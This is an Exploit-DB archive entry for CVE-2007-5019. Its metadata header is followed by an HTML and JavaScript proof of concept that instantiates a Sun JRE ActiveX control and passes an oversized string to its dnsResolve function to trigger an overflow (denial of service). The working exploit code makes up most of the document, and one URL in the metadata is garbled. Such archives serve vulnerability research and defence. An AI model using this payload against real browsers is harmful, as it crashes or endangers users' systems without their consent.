EXPLOITS

Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow

Author: YAG KOHHA
type: dos
platform: multiple
port: 
date_added: 2007-09-18  
date_updated: 2016-10-19  
verified: 1  
codes: OSVDB-38297;CVE-2007-5019  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comjre-6u1-windows-i586-p.exe  

raw file: 4432.html  

<html>
<body>
<center>
Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC<br>
Bug founded and code released by Yag Kohha. <br>
Greetz to: <br>
Shinnai, Str0ke <br>

</center>
<object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284"
id="target"></OBJECT>
<SCRIPT language="javascript">
var b = 'XXXX';
while (b.length <= 512*512) b+=b;
target.dnsResolve(b);
</script>
</body>
</html>

# milw0rm.com [2007-09-19]